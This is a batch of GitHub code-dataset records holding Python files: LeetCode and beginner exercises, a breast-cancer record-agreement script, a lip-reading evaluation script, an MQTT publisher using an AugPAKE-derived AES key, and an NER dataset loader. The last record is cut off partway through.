monotoneIncreasingDigits(self, N):\n \"\"\"\n :type N: int\n :rtype: int\n \"\"\"\n li = [int(i) for i in str(N)]\n for i in range(len(li)-2, -1, -1):\n if li[i] <= li[i+1]:\n continue\n else:\n # set li[i] minus 1, and everything right to 9\n li[i] -= 1\n for j in range(i+1, len(li)):\n li[j] = 9\n while li[0] == 0:\n li.pop(0)\n return int(\"\".join([str(i) for i in li]))\n \n \n ","repo_name":"JerryHu1994/LeetCode-Practice","sub_path":"Solutions/738-Monotone-Increasing-Digits/python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"7710420665","text":"import numpy as np\nimport pandas as pd\n\nreviewed = pd.read_excel(f'/share/fsmresfiles/breast_cancer_pregnancy/data/03_reviewed_erica_takahiro/takahiro_erica_reviewed_200.xlsx')\nmined = pd.read_csv(f'/share/fsmresfiles/breast_cancer_pregnancy/data/05_import_to_redcap/20220616_redcap_import_data.csv')\n\nreviewed['DOB'] = pd.to_datetime(reviewed['DOB'])\nmined['dob'] = pd.to_datetime(mined['dob'])\n\ndef match_patient(reviewed_sample, mined_df):\n # get reviewed data \n reviewed_dob = reviewed_sample['DOB']\n reviewed_mrn = reviewed_sample['MRN']\n reviewed_last_name = reviewed_sample['Patient Name'].split()[-1]\n # match to mined \n matched = mined_df.iloc[\n (reviewed_last_name==np.array([x.split()[-1] for x in mined_df['last_name'].values]))\n & (reviewed_mrn==mined_df['epic_mrn'].values)\n & (reviewed_dob==mined_df['dob']).values,\n :\n ]\n return matched\n\ndemo = {\n 'Age at Breast CA Dx' : 'age_at_diagnosis',\n}\n\ngyn = {\n 'Number Pregnancies (G)' : 'number_pregnancies', \n '# Live Births (P)' : 'number_births', \n 'Age at first pregnancy' : 'age_at_first_pregnancy',\n 'Age at most recent pregnancy' : 'age_at_most_recent_pregnancy',\n}\n\ntumor = {\n 'Histology (IDC, ILC, DCIS, other)' : 'histology',\n 'Tumor size (mm)' : 'tumor_size', \n 'Histologic grade (1-3)' : 'histologic_grade',\n 'ER status (pos/neg)' : 'er_status',\n 'PR status (pos/neg)' : 'pr_status', \n 'HER2Neu status (pos/neg/not performed)' : 'her2_status',\n 'Ki67 level (low/int/high/not performed)' : 'ki67',\n}\n\n# genetic = {\n# 'Genetic Testing Results' : '', # UNFORMATTED\n# }\n\nloss = pd.DataFrame(\n index=reviewed.index,\n columns=list(demo.values()) + list(gyn.values()) + list(tumor.values())\n)\n\nmissing = []\n\nfor i in loss.index:\n reviewed_sample = reviewed.loc[i,:]\n matched_mined = match_patient(reviewed_sample, mined)\n if matched_mined.shape[0]>0:\n # demo \n key = 'Age at Breast CA Dx'\n if ',' in str(reviewed_sample.loc[key]):\n loss.loc[i,demo[key]] = np.min([int(x) for x in reviewed_sample.loc[key].split(', ')]) - matched_mined.loc[:,demo[key]].values[0]\n elif pd.isnull(reviewed_sample.loc[key]):\n continue\n else:\n loss.loc[i,demo[key]] = reviewed_sample.loc[key]-matched_mined.loc[:,demo[key]].values[0]\n # gynecological \n for key in gyn.keys():\n loss.loc[i,gyn[key]] = reviewed_sample.loc[key]-matched_mined.loc[:,gyn[key]].values[0]\n # tumor size\n key = 'Tumor size (mm)'\n if str(reviewed_sample.loc[key]).startswith(', '):\n reviewed_sample.loc[key] = int(reviewed_sample.loc[key][2:])\n elif ',' in str(reviewed_sample.loc[key]):\n reviewed_sample.loc[key] = np.max([int(x) for x in reviewed_sample.loc[key].split(',')])\n loss.loc[i,tumor[key]] = reviewed_sample.loc[key]/10 - matched_mined.loc[:,tumor[key]].values[0]\n elif '/' in str(reviewed_sample.loc[key]):\n reviewed_sample.loc[key] = np.max([int(x) for x in reviewed_sample.loc[key].split('/')])\n loss.loc[i,tumor[key]] = reviewed_sample.loc[key]/10 - matched_mined.loc[:,tumor[key]].values[0]\n elif type(reviewed_sample.loc[key])==str:\n continue\n else:\n loss.loc[i,tumor[key]] = reviewed_sample.loc[key]/10 - matched_mined.loc[:,tumor[key]].values[0]\n # histology \n key = 'Histology (IDC, ILC, DCIS, other)'\n if pd.isnull(matched_mined.loc[:,tumor[key]].values[0]):\n continue\n else:\n matched_histology = {1:'IDC', 2:'ILC', 3:'DCIS', 4:'Other'}[matched_mined.loc[:,tumor[key]].values[0]]\n if reviewed_sample.loc[key]=='Mixed':\n loss.loc[i,tumor[key]] = 0\n else:\n loss.loc[i,tumor[key]] = 0 if matched_histology.lower() in reviewed_sample.loc[key].lower() else 1\n # grade \n key = 'Histologic grade (1-3)'\n if pd.isnull(matched_mined.loc[:,tumor[key]].values[0]):\n continue\n else:\n matched_grade = {1:'No histologic grade (DCIS)', 2:'1', 3:'2', 4:'3'}[matched_mined.loc[:,tumor[key]].values[0]]\n if 'DCIS' in reviewed_sample.loc['Histology (IDC, ILC, DCIS, other)']:\n loss.loc[i,tumor[key]] = 0\n else:\n loss.loc[i,tumor[key]] = 0 if matched_grade.lower() in str(reviewed_sample.loc[key]) else 1\n # er\n key = 'ER status (pos/neg)'\n if pd.isnull(matched_mined.loc[:,tumor[key]].values[0]):\n continue\n else:\n matched_er = {1:'Positive', 2:'Negative'}[matched_mined.loc[:,tumor[key]].values[0]].lower()\n loss.loc[i,tumor[key]] = 0 if str(reviewed_sample.loc[key]).lower() in matched_er else 1\n # pr\n key = 'PR status (pos/neg)'\n if pd.isnull(matched_mined.loc[:,tumor[key]].values[0]):\n continue\n else:\n matched_pr = {1:'Positive', 2:'Negative'}[matched_mined.loc[:,tumor[key]].values[0]].lower()\n loss.loc[i,tumor[key]] = 0 if str(reviewed_sample.loc[key]).lower() in matched_pr else 1\n # her2 \n key = 'HER2Neu status (pos/neg/not performed)'\n if pd.isnull(matched_mined.loc[:,tumor[key]].values[0]):\n continue\n else:\n matched_her2 = {1:'Positive', 2:'Negative', 3:'Not performed'}[matched_mined.loc[:,tumor[key]].values[0]].lower()\n loss.loc[i,tumor[key]] = 0 if str(reviewed_sample.loc[key]).lower()[-3:] in matched_her2 else 1\n # ki67\n key = 'Ki67 level (low/int/high/not performed)'\n if pd.isnull(matched_mined.loc[:,tumor[key]].values[0]):\n continue\n else:\n matched_ki67 = {1:'Low', 2:'Intermediate', 3:'High', 4:'Not performed'}[matched_mined.loc[:,tumor[key]].values[0]].lower()\n if ',' in str(reviewed_sample.loc[key]):\n loss.loc[i,tumor[key]] = 0 if np.any([x.strip() in matched_ki67 for x in str(reviewed_sample.loc[key]).lower().split(',')]) else 1\n elif '/' in str(reviewed_sample.loc[key]):\n loss.loc[i,tumor[key]] = 0 if np.any([x.strip() in matched_ki67 for x in str(reviewed_sample.loc[key]).lower().split('/')]) else 1\n else:\n loss.loc[i,tumor[key]] = 0 if str(reviewed_sample.loc[key]).lower() in matched_ki67 else 1\n else:\n missing.append(i)\n\nloss.to_csv('/home/srd6051/20230401_patient_agreement_test.csv')\n\nnp.mean(loss**2, axis=0)\n","repo_name":"sayadennis/recent-parity","sub_path":"05_data_summary/calculate_mining_review_agreement.py","file_name":"calculate_mining_review_agreement.py","file_ext":"py","file_size_in_byte":6531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"23233662850","text":"'''\nOs números primos possuem várias aplicações dentro da Computação, por exemplo na Criptografia.\n Um número primo é aquele que é divisível apenas por um e por ele mesmo. Faça um programa\n que peça um número inteiro e determine se ele\n é ou não um número primo.\n\n '''\n\ndef calte(numero):\n resto = (numero)\n mmc = 0\n for x in range(1,100):\n resto = (resto/x)\n if(round(resto)==resto):\n mmc+=1\n elif(round(resto) != resto):\n x+=1\n if(resto==1 or resto==0):\n break\n print(\"MMC\",mmc)\n if(mmc < 2 ):\n print(\"PRIMO\")\n else:\n print(\"não primo\")\n\nif __name__ == '__main__':\n entrada = int(input())\n calte(entrada)\n","repo_name":"YgorXavierS/ProjetoPython","sub_path":"Brasil Python/REPETIÇÃO/34.py","file_name":"34.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"24703801643","text":"import numpy as np\nimport torch, os, cv2, pickle\n\nfrom tqdm import tqdm\nfrom glob import glob\nimport pandas as pd\n\nfrom utils import load, levenshtein\nfrom inference import main as inference_initializer\nfrom inference import run as get_prediction\nfrom inference import args\n\ndef main(args):\n\tmodel, video_loader, lm, lm_tokenizer = inference_initializer(args)\n\n\ttotal_wer, total_cer, total_tokens, total_chars = 0., 0., 0., 0.\n\n\tdf = pd.read_csv(args.fpath)\n\tfnames = df[list(df.columns.values)[0]].tolist()\n\ttexts = df['transcript'].tolist()\n\n\tprog_bar = tqdm(list(zip(fnames, texts)))\n\tfor data in prog_bar:\n\t\tfname = data[0]\n\t\tif fname.endswith('.wav'): fname = fname[:-4]\n\t\tgt = data[1]\n\n\t\tfpath = f\"{args.videos_root}/{fname}.mp4\"\n\t\tpred = get_prediction(fpath, video_loader, model, \n\t\t\t\t\t\t\t\tlm, lm_tokenizer, display=False)\n\t\t\n\t\twer = levenshtein(gt.split(), pred.split())\n\t\tcer = levenshtein(list(gt), list(pred))\n\n\t\ttotal_wer += wer\n\t\ttotal_cer += cer\n\t\ttotal_tokens += len(gt.split())\n\t\ttotal_chars += len(list(gt))\n\n\t\tprog_bar.set_description('WER: {}, CER: {}'.format(\n\t\t\t\t\t\t\t\ttotal_wer / total_tokens, total_cer / total_chars))\n\nif __name__ == '__main__':\n\tmain(args)","repo_name":"prajwalkr/vtp","sub_path":"score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"44"} +{"seq_id":"1231902592","text":"from base import BasePlayer,Chess,is_win\nfrom PyQt5 import QtGui\nfrom PyQt5.QtGui import QPixmap\nfrom PyQt5.QtWidgets import QMessageBox,QLabel\n#生成逻辑棋盘\n#chessboard=[[None for i in range(0,19)] for j in range(0,19)]\nclass DoublePlayer(BasePlayer):\n def __init__(self,parent=None):\n super().__init__(parent)\n self.is_black=True\n self.chessboard=chessboard=[[None for i in range(0,19)] for j in range(0,19)]\n self.is_over=True\n self.restart_btn.clicked.connect(self.restart)\n self.win_label=None\n self.huiqi_btn.clicked.connect(self.huiqi)\n self.lose_btn.clicked.connect(self.lose)\n self.history=[]\n def restart(self):\n self.is_over=False\n if self.win_label is not None:\n self.win_label.close()\n for i in range(19):\n for j in range(19):\n if self.chessboard[j][i] is not None:\n self.chessboard[j][i].close()\n self.chessboard[j][i]=None\n def huiqi(self):\n\n if self.is_over:\n return\n a = self.history.pop()\n xx = a[0]\n yy = a[1]\n if self.chessboard[xx][yy] is not None:\n self.chessboard[xx][yy].close()\n self.chessboard[xx][yy] = None\n\n self.is_black = not self.is_black\n\n def lose(self):\n if self.is_over:\n return\n xx = self.history[::-1][0][0]\n yy = self.history[::-1][0][1]\n self.win_label = QLabel(self)\n if self.chessboard[xx][yy].color == 'b':\n pic = QPixmap(\"photos/黑棋胜利.png\")\n else:\n pic = QPixmap(\"photos/白棋胜利.png\")\n self.win_label.setPixmap(pic)\n self.win_label.move(100, 100)\n self.win_label.show()\n self.is_over = True\n\n def mouseReleaseEvent(self, a0: QtGui.QMouseEvent):\n if self.is_over:\n return\n if a0.x() <40 or a0.x()>600:\n return\n if a0.y()<40 or a0.y()>600:\n return\n if self.is_black:\n self.chess=Chess(color='b',parent=self)\n else:\n self.chess = Chess(color='w', parent=self)\n #self.is_black=not self.is_black\n if (a0.x()-50)%30<=15:\n x=(a0.x()-50)//30*30+50\n else:\n x=((a0.x()-50)//30+1)*30+50\n if (a0.y() - 50) % 30 <= 15:\n y = (a0.y()-50) // 30 * 30 + 50\n else:\n y = ((a0.y() - 50) // 30 + 1) * 30 + 50\n xx =(x-50)//30\n yy =(y-50)//30\n\n\n if self.chessboard[xx][yy] is not None:\n return\n self.chessboard[xx][yy]=self.chess\n self.history.append([xx, yy])\n\n x=x-self.chess.width()/2\n y=y-self.chess.height()/2\n self.chess.move(x,y)\n self.chess.show()\n self.is_black = not self.is_black\n color = is_win(self.chessboard)\n\n if color is False:\n return\n else:\n #QMessageBox.information(self,\"消息\",\"{}棋胜利\".format(color))\n self.win_label =QLabel(self)\n if color=='b':\n pic =QPixmap(\"photos/黑棋胜利.png\")\n else:\n pic = QPixmap(\"photos/白棋胜利.png\")\n self.win_label.setPixmap(pic)\n self.win_label.move(100,100)\n self.win_label.show()\n self.is_over=True","repo_name":"yangzhiy/gobang","sub_path":"doubleplayer.py","file_name":"doubleplayer.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72800772292","text":"\"\"\" NER dataset \"\"\"\nimport os\nimport logging\nimport requests\nimport json\nimport hashlib\nfrom unicodedata import normalize\nfrom typing import Dict, List\nfrom itertools import chain\nfrom os.path import join as pj\n\nfrom datasets import load_dataset\n\nlogging.basicConfig(format='%(asctime)s %(levelname)-8s %(message)s', level=logging.INFO, datefmt='%Y-%m-%d %H:%M:%S')\nCACHE_DIR = f\"{os.path.expanduser('~')}/.cache/tner\"\nCHECKSUM_SHARED_LABEL = 'a6b6bbfd6ddf3f990ee6b335ade46429'\n\n\n__all__ = (\n \"get_dataset\",\n \"concat_dataset\",\n \"get_shared_label\"\n)\n\n\ndef get_shared_label(cache_dir: str = None):\n \"\"\" universal label set to unify the NER datasets\n\n @param cache_dir: cache directly\n @return: a dictionary mapping from label to id\n \"\"\"\n cache_dir = CACHE_DIR if cache_dir is None else cache_dir\n os.makedirs(cache_dir, exist_ok=True)\n url = f\"https://raw.githubusercontent.com/asahi417/tner/master/unified_label2id.json\"\n path = pj(cache_dir, \"unified_label2id.json\")\n if os.path.exists(path):\n with open(path, 'rb') as f:\n checksum = hashlib.md5(f.read()).hexdigest()\n if CHECKSUM_SHARED_LABEL == checksum:\n with open(path) as f:\n label2id = json.load(f)\n return label2id\n else:\n logging.warning('local `unified_label2id.json` has wrong checksum')\n with open(path, \"w\") as f:\n logging.info(f'downloading `unified_label2id.json` from {url}')\n r = requests.get(url)\n label2id = json.loads(r.content)\n json.dump(label2id, f)\n # file_checksum = hashlib.md5(open(path, 'rb').read()).hexdigest()\n # assert file_checksum == CHECKSUM_SHARED_LABEL,\\\n # f\"checksum inconsistency {file_checksum} != {CHECKSUM_SHARED_LABEL}\"\n return label2id\n\n\ndef get_hf_label2id(dataset, cache_dir: str = None):\n \"\"\" get `label2id` from TNER huggingface dataset https://huggingface.co/tner\n\n @param dataset: dataset name\n @param cache_dir: [optional] huggingface cache directly\n @return: a dictionary mapping from label to id\n \"\"\"\n url = f\"https://huggingface.co/datasets/tner/label2id/raw/main/files/{os.path.basename(dataset)}.json\"\n cache_dir = CACHE_DIR if cache_dir is None else cache_dir\n path = pj(cache_dir, f\"{dataset}.label2id.json\")\n os.makedirs(os.path.dirname(path), exist_ok=True)\n try:\n with open(path) as f:\n label2id = json.load(f)\n except Exception:\n with open(path, \"w\") as f:\n r = requests.get(url)\n label2id = json.loads(r.content)\n json.dump(label2id, f)\n return label2id\n\n\ndef get_hf_dataset(dataset: str = 'tner/conll2003',\n dataset_name: str = None,\n cache_dir: str = None,\n use_auth_token: bool = False):\n \"\"\" load dataset from TNER huggingface dataset https://huggingface.co/tner\n\n @param dataset: dataset alias on huggingface dataset hub\n @param dataset_name: [optional] dataset name to specify\n @param cache_dir: [optional] huggingface cache directly\n @return: (data, label2id)\n - data: a dictionary of {\"tokens\": [list of tokens], \"tags\": [list of tags]}\n - label2id: a dictionary mapping from label to id\n \"\"\"\n if dataset_name is not None:\n data = load_dataset(dataset, dataset_name, use_auth_token=use_auth_token)\n else:\n data = load_dataset(dataset, use_auth_token=use_auth_token)\n label2id = get_hf_label2id(dataset, cache_dir)\n data = {k: {\"tokens\": data[k][\"tokens\"], \"tags\": data[k][\"tags\"]} for k in data.keys()}\n return data, label2id\n\n\ndef load_conll_format_file(data_path: str, label2id: Dict = None):\n \"\"\" load dataset from local IOB format file\n\n @param data_path: path to iob file\n @param label2id: [optional] dictionary of label2id (generate from dataset as default )\n @return: (data, label2id)\n - data: a dictionary of {\"tokens\": [list of tokens], \"tags\": [list of tags]}\n - label2id: a dictionary mapping from label to id\n \"\"\"\n inputs, labels, seen_entity = [], [], []\n with open(data_path, 'r') as f:\n sentence, entity = [], []\n for n, line_raw in enumerate(f):\n line = normalize('NFKD', line_raw).strip()\n if len(line) == 0 or line.startswith(\"-DOCSTART-\"):\n if len(sentence) != 0:\n assert len(sentence) == len(entity)\n inputs.append(sentence)\n labels.append(entity)\n sentence, entity = [], []\n else:\n ls = line.split()\n if len(ls) < 2:\n if line_raw.startswith('O'):\n logging.warning(f'skip {ls} (line {n} of file {data_path}): '\n f'missing token (should be word and tag separated by '\n f'a half-space, eg. `London B-LOC`)')\n continue\n else:\n ls = ['', ls[0]]\n # Examples could have no label for mode = \"test\"\n word, tag = ls[0], ls[-1]\n sentence.append(word)\n entity.append(tag)\n\n if len(sentence) != 0:\n assert len(sentence) == len(entity)\n inputs.append(sentence)\n labels.append(entity)\n\n all_labels = sorted(list(set(list(chain(*labels)))))\n if label2id is None:\n label2id = {t: n for n, t in enumerate(all_labels)}\n else:\n labels_not_found = [i for i in all_labels if i not in label2id]\n if len(labels_not_found) > 0:\n logging.warning(f'found entities not in the label2id (label2id was updated):\\n\\t - {labels_not_found}')\n label2id.update({i: len(label2id) + n for n, i in enumerate(labels_not_found)})\n assert all(i in label2id for i in all_labels), \\\n f\"label2id is not covering all the entity \\n \\t- {label2id} \\n \\t- {all_labels}\"\n keys = label2id.copy().keys()\n for l in keys:\n if l.startswith('B'):\n entity = l[2:]\n if 'I-'+entity not in label2id:\n label2id.update({'I-'+entity: len(label2id)})\n logging.warning(f'found entities without I label2id (label2id was updated):\\n\\t - {entity}')\n labels = [[label2id[__l] for __l in _l] for _l in labels]\n data = {\"tokens\": inputs, \"tags\": labels}\n return data, label2id\n\n\ndef get_conll_format_dataset(local_dataset: Dict):\n \"\"\" load dataset from local IOB files\n\n @param local_dataset: a dictionary of paths to local BIO files eg.\n {\"train\": \"examples/local_dataset_sample/train.txt\", \"test\": \"examples/local_dataset_sample/test.txt\"}\n @return: (data, label2id)\n - data: a dictionary of {\"train\": {\"tokens\": [list of tokens], \"tags\": [list of tags]}}\n - label2id: a dictionary mapping from label to id\n \"\"\"\n data = {}\n label2id = None\n for file_name in sorted(local_dataset.keys()):\n file_path = local_dataset[file_name]\n assert os.path.exists(file_path), file_path\n _data, label2id = load_conll_format_file(file_path, label2id)\n data[file_name] = _data\n return data, label2id\n\n\ndef get_dataset_single(dataset: str = None,\n local_dataset: Dict = None,\n dataset_name: str = None,\n cache_dir: str = None,\n use_auth_token: bool = False):\n \"\"\" get NER dataset\n\n @param dataset: dataset name on huggingface tner organization (https://huggingface.co/datasets?search=tner)\n @param local_dataset: a dictionary of paths to local BIO files eg.\n {\"train\": \"examples/local_dataset_sample/train.txt\", \"test\": \"examples/local_dataset_sample/test.txt\"}\n @param dataset_name: [optional] data name of huggingface dataset\n @param cache_dir: [optional] cache directly\n @return: (data, label2id)\n - data: a dictionary of {\"train\": {\"tokens\": [list of tokens], \"tags\": [list of tags]}}\n - label2id: a dictionary mapping from label to id\n \"\"\"\n if dataset is not None:\n if local_dataset is not None:\n logging.warning(f\"local_dataset ({local_dataset}) is provided but ignored as dataset ({dataset}) is given\")\n data, label2id = get_hf_dataset(\n dataset, dataset_name=dataset_name, cache_dir=cache_dir, use_auth_token=use_auth_token\n )\n\n else:\n assert local_dataset is not None, \"need either of `dataset` or `local_dataset`\"\n data, label2id = get_conll_format_dataset(local_dataset)\n return data, label2id\n\n\ndef concat_dataset(list_of_data, cache_dir: str = None, label2id: Dict = None):\n \"\"\" concat multiple NER dataset with a unified label set\n\n @param list_of_data: a list of output from `get_dataset` eg. [(data_A, label2id_A), (data_B, label2id_B), ... ]\n @param cache_dir: [optional] cache directly\n @param label2id: [optional] define label2id map\n @return: (data, label2id)\n - data: a dictionary of {\"train\": {\"tokens\": [list of tokens], \"tags\": [list of tags]}}\n - label2id: a dictionary mapping from label to id\n \"\"\"\n # unify label2id\n unified_label_set = get_shared_label(cache_dir)\n all_labels = []\n normalized_entities = {}\n for _, _label2id in list_of_data:\n all_labels += list(_label2id.keys())\n entities = set('-'.join(i.split('-')[1:]) for i in _label2id.keys() if i != 'O')\n for entity in entities:\n normalized_entity = [k for k, v in unified_label_set.items() if entity in v]\n assert len(normalized_entity) <= 1, f'duplicated entity found in the shared label set\\n {normalized_entity} \\n {entity}'\n if len(normalized_entity) == 0:\n # logging.warning(f'Entity `{entity}` is not found in the shared label set {unified_label_set}. '\n # f'Original entity (`{entity}`) will be used as label.')\n normalized_entities[entity] = entity\n else:\n normalized_entities[entity] = normalized_entity[0]\n all_labels = sorted([i for i in set(all_labels) if i != \"O\"])\n normalized_labels = [f\"{i.split('-')[0]}-{normalized_entities['-'.join(i.split('-')[1:])]}\" for i in all_labels]\n normalized_labels = list(set(normalized_labels))\n # input(normalized_labels)\n if label2id is not None:\n assert all(i in label2id.keys() for i in normalized_labels),\\\n f\"missing entity in label2id {label2id.keys()}: {normalized_labels}\"\n normalized_label2id = label2id\n else:\n normalized_label2id = {k: n for n, k in enumerate(sorted(normalized_labels))}\n normalized_label2id.update({\"O\": len(normalized_label2id)})\n # input(normalized_label2id)\n\n # update labels & concat data\n concat_tokens = {}\n concat_tags = {}\n for data, _label2id in list_of_data:\n id2label = {v: k for k, v in _label2id.items()}\n for _split in data.keys():\n if _split not in concat_tokens:\n concat_tokens[_split] = []\n concat_tags[_split] = []\n concat_tokens[_split] += data[_split]['tokens']\n for tags in data[_split]['tags']:\n normalized_tag = []\n for t in tags:\n if id2label[t] != 'O':\n t = f\"{id2label[t].split('-')[0]}-{normalized_entities['-'.join(id2label[t].split('-')[1:])]}\"\n else:\n t = id2label[t]\n normalized_tag.append(normalized_label2id[t])\n concat_tags[_split].append(normalized_tag)\n\n # sanity check\n assert concat_tags.keys() == concat_tokens.keys(), f\"{concat_tags.keys()} != {concat_tokens.keys()}\"\n for s in concat_tags.keys():\n assert len(concat_tags[s]) == len(concat_tokens[s]), f\"{len(concat_tags[s])} != {len(concat_tokens[s])}\"\n assert all(len(a) == len(b) for a, b in zip(concat_tags[s], concat_tokens[s]))\n data = {s: {\"tokens\": concat_tokens[s], \"tags\": concat_tags[s]} for s in concat_tags.keys()}\n return data, normalized_label2id\n\n\ndef get_dataset(dataset: List or str = None,\n local_dataset: List or Dict = None,\n dataset_name: List or str = None,\n concat_label2id: Dict = None,\n cache_dir: str = None,\n use_auth_token: bool = False):\n \"\"\" get NER datasets (concat mutiple datasets)\n\n @param dataset: dataset name (or a list of it) on huggingface tner organization (https://huggingface.co/datasets?search=tner)\n (eg. \"tner/conll2003\", [\"tner/conll2003\", \"tner/ontonotes5\"]]\n @param local_dataset: a dictionary (or a list) of paths to local BIO files eg.\n {\"train\": \"examples/local_dataset_sample/train.txt\", \"test\": \"examples/local_dataset_sample/test.txt\"}\n @param dataset_name: [optional] data name of huggingface dataset (should be same length as the `dataset`)\n @param concat_label2id: [optional] define label2id map for multiple dataset concatenation (nothing to do with single data)\n @param cache_dir: [optional] cache directly\n @return: (data, label2id)\n - data: a dictionary of {\"train\": {\"tokens\": [list of tokens], \"tags\": [list of tags]}}\n - label2id: a dictionary mapping from label to id\n \"\"\"\n assert dataset is not None or local_dataset is not None, \"`datasets` or `local_datasets` should be provided\"\n dataset_list = []\n # load huggingface dataset\n if dataset is not None:\n if type(dataset) is str:\n assert dataset_name is None or type(dataset_name) is str, \\\n f\"`dataset_name` should be string but given {dataset_name}\"\n data, label2id = get_dataset_single(\n dataset=dataset, dataset_name=dataset_name, cache_dir=cache_dir, use_auth_token=use_auth_token)\n dataset_list.append((data, label2id))\n else:\n assert dataset_name is None or (\n type(dataset_name) is list and\n len(dataset) == len(dataset_name)), \\\n f\"dataset_name not matched: {dataset} vs {dataset_name}\"\n for n, d in enumerate(dataset):\n data, label2id = get_dataset_single(\n dataset=d,\n dataset_name=dataset_name[n] if dataset_name is not None else None,\n cache_dir=cache_dir\n )\n dataset_list.append((data, label2id))\n # load custom dataset\n if local_dataset is not None:\n if type(local_dataset) is dict:\n data, label2id = get_dataset_single(local_dataset=local_dataset, cache_dir=cache_dir)\n dataset_list.append((data, label2id))\n else:\n for d in local_dataset:\n data, label2id = get_dataset_single(local_dataset=d, cache_dir=cache_dir)\n dataset_list.append((data, label2id))\n # concat datasets\n if len(dataset_list) > 1:\n logging.info(f'concat {len(dataset_list)} datasets')\n data, label2id = concat_dataset(dataset_list, label2id=concat_label2id, cache_dir=cache_dir)\n else:\n if concat_label2id is not None:\n logging.warning(f'concat_label2id is specified {concat_label2id} but not changed as is only one dataset')\n data, label2id = dataset_list[0]\n return data, label2id\n","repo_name":"asahi417/tner","sub_path":"tner/get_dataset.py","file_name":"get_dataset.py","file_ext":"py","file_size_in_byte":15418,"program_lang":"python","lang":"en","doc_type":"code","stars":332,"dataset":"github-code","pt":"44"} +{"seq_id":"24450285289","text":"#!/usr/bin/python\n\nimport paho.mqtt.publish as publish\nimport subprocess\nimport os, sys, logging\nfrom tailf import tailf\nfrom aes_cipher import AESCipher\nfrom config import *\n\n\n# logger configuration\nLOGGING_FILE = 'mqtt-pub.log'\nlogging.basicConfig(\n # filename=LOGGING_FILE,\n level=logging.DEBUG,\n format='%(asctime)s [%(levelname)s] %(filename)s_%(lineno)d : %(message)s')\nlogger = logging.getLogger('root')\n\n\ndef main():\n logger.debug(\"AUGPAKE_SERVER_IP: {}\".format(AUGPAKE_SERVER_IP))\n logger.debug(\"AUGPAKE_SERVER_PORT: {}\".format(AUGPAKE_SERVER_PORT))\n logger.debug(\"MQTT_BROKER_IP: {}\".format(MQTT_BROKER_IP))\n logger.debug(\"MQTT_BROKER_PORT: {}\".format(MQTT_BROKER_PORT))\n\n try:\n ID, Key = getKeyByAugPake(AUGPAKE_SERVER_IP, AUGPAKE_SERVER_PORT)\n except (OSError, IndexError) as e:\n logger.error(e)\n Key = None\n\n if Key is None:\n logger.error(\"Key is None. Exit...\")\n exit()\n\n # create cipher\n cipher = AESCipher(Key)\n\n for line in tailf(WATCH_FILE):\n logger.debug(\"Plain Text: {}\".format(line))\n encrypt_ctx = cipher.encrypt(line)\n prefix_encrypt = ID + SEP + encrypt_ctx;\n logger.debug(\"Encrypt Text prefixed ID: {}\".format(prefix_encrypt))\n publish.single(MQTT_TOPIC, prefix_encrypt, hostname=MQTT_BROKER_IP, port=MQTT_BROKER_PORT)\n\n\ndef getKeyByAugPake(ip, port):\n \"\"\"\n Return (id, key) pair\n \"\"\"\n work_dir = os.path.abspath(os.path.dirname(sys.argv[0])) + \"/../augpake_src/client/\"\n out = subprocess.check_output([\"./s_client\", ip, port], cwd=work_dir)\n id = out.split(\"-\")[0].strip()\n key = out.split(\"-\")[1].strip()\n if id:\n logger.info(\"Session ID: {}\".format(id))\n logger.info(\"Session KEY: {}\".format(key))\n return id, key\n else:\n # If something wrong, return (None, None)\n return None, None\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ogre0403/NCHC-AIST-Joint-Project","sub_path":"mqtt-python/mqtt-pub.py","file_name":"mqtt-pub.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"73205989253","text":"class Solution:\n def convert(self, s: str, numRows: int) -> str:\n n = numRows\n if n == 1: \n return s\n rows = ['' for _ in range(n)]\n j, d = 0, 1\n for i in range(len(s)):\n # add the current character to corresponding row\n rows[j] += s[i]\n # if it reaches to the last row, we need to go up\n if j == n - 1: \n d = -1\n # if it reaches to the first row, we need to go down\n elif j == 0: \n d = 1\n # move j pointer\n j += d\n \n return ''.join(rows)","repo_name":"RishabhRathi-Dev/DSA-Practice","sub_path":"DSA Practice/LeetCode/6. Zigzag Conversion/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"36279624844","text":"\"\"\"\r\nfrase = str(input('Digite uma frase: ')).lower().replace(' ', '').strip()\r\n\r\nf = frase[::-1].lower().replace(' ', '')\r\n\r\nif f == frase:\r\n print('É um palíndromo')\r\nelse:\r\n print(f'{frase} não é um palíndromo')\r\n print('Erro')\r\n\r\n\"\"\"\r\n\r\nfrase = str(input('Digite uma frase: ')).strip().upper()\r\npalavras = frase.split()\r\njunto = ''.join(palavras)\r\ninverso = ''\r\nfor letra in range(len(junto) - 1, -1, -1):\r\n inverso += junto[letra]\r\nprint(f'O inverso de {junto} é {inverso}')\r\nif inverso == junto:\r\n print('Temos um palíndromo')\r\nelse:\r\n print('A frase digitada não é um palíndromo!')\r\n","repo_name":"hianp/Exercicios_Curso_em_video_Py","sub_path":"Ex053.py","file_name":"Ex053.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"21409689520","text":"import pandas\nimport os\nfrom collections import defaultdict\nimport sys\nimport argparse\nimport numpy\nimport pathlib\nfrom lib.dorotheadb import *\nfrom lib.calculate_stats import *\nfrom scipy.stats import nchypergeom_wallenius, hypergeom, rankdata\nimport json\n\nparser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\nparser.add_argument(\"-db\", \"--database\", help=\"select level of confidence for dorothea\", default=\"C\")\nparser.add_argument(\"-org\", \"--organism\", type=int, help=\"select tax id: 9606 for human and 10090 